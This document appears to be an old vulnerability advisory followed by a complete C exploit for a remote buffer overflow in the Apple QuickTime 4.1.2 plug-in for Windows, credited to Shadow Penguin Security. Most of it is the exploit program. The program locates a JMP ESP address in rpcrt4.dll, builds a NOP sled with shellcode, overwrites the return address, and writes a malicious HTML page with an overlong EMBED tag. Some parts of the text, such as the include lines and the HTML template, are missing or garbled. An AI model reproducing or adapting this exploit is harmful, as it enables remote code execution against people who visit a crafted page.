Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow. A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code. /*==================================================================== Apple QuickTime 4.1.2 plug-in exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ==================================================================== */ #include #include #include #define MOV_FILE "c:\\program files\\quicktime\\sample.mov" #define HEIGHT 60 #define WIDTH 60 #define TARGET "QUICKTIMEPLAYER" #define FILE_IMAGE \ "
" #define BUFSIZE 730 #define RET 684 #define ESP_TGT "rpcrt4.dll" #define JMPESP_1 0xff #define JMPESP_2 0xe4 #define NOP 0x90 unsigned char exploit_code[200]={ 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50, 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48, 0xFF,0xD0,0x00, }; main(int argc,char *argv[]) { FILE *fp; char buf[BUFSIZE]; unsigned int i,pretadr,p,ip,kp; MEMORY_BASIC_INFORMATION meminfo; if (argc<2){ printf("usage : %s Output_HTML-fileName [Sample .mov file]\n", argv[0]); exit(1); } if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){ printf("%s is not found.\n",ESP_TGT); exit(1); } VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); pretadr=0; for (i=0;i>8 )&0xff)==0 || ((p>>16)&0xff)==0 || ((p>>24)&0xff)==0) continue; if ( *((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==JMPESP_2) pretadr=p; } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("File write error \"%s\"\n",argv[1]); exit(1); } memset(buf,NOP,BUFSIZE); memcpy(buf+700-12,exploit_code,strlen(exploit_code)); buf[BUFSIZE-2]=0; ip=pretadr; printf("EIP=%x\n",ip); buf[RET ]=ip&0xff; buf[RET+1]=(ip>>8)&0xff; buf[RET+2]=(ip>>16)&0xff; buf[RET+3]=(ip>>24)&0xff; if (argc==2) fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET); else fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET); fclose(fp); printf("Done.\n"); } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin@backsection.net (SPS-Official) unyun@shadowpenguin.org (Personal) % eEye Digital Security Team [ http://www.eEye.com ] unyun@eEye.com